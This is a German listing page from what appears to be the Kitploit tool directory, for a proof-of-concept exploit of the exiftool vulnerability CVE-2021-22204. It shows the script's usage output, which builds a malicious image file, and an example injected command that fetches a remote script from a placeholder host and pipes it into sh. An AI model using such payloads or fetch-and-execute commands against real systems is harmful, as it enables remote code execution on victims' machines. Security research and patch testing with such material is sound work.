Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-CVE-2021-22204 — POC für exiftool Schwachstelle (CVE-2021-22204). | Kitploit
Tools/GitHubGitHub/bilkoh/poc-cve-2021-22204
Payload-GenerierungSchwachstellenanalyseExploitationWebsicherheitPenetrationstests
GitHubbilkoh/poc-cve-2021-22204

POC-CVE-2021-22204

POC für exiftool Schwachstelle (CVE-2021-22204).

Repository anzeigen
83vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

POC-CVE-2021-22204

https://nvd.nist.gov/vuln/detail/CVE-2021-22204

Dies ist nur ein praktisches Skript, das ich zum Testen geschrieben habe.

Ausgabe

root@kitploit:~
Usage ./build_image.pl <cmd to inject>
        Note: if your cmd contains unix special characters use quote!
        EG: ./build_image.pl "curl xxxx.com/script.sh|sh"
This poc generates an image file (notevil.jpg) to be proccessed by vulnerable exiftool.
And requires DjVuLibre to be installed and in PATH
         See: http://djvu.sourceforge.net/
---

[+] Preparing annotation file.
[+] Creating image file with: djvumake notevil.jpg INFO=0,0 BGjp=/dev/null ANTa=ant.out
[+] notevil.jpg created.
Tool herunterladen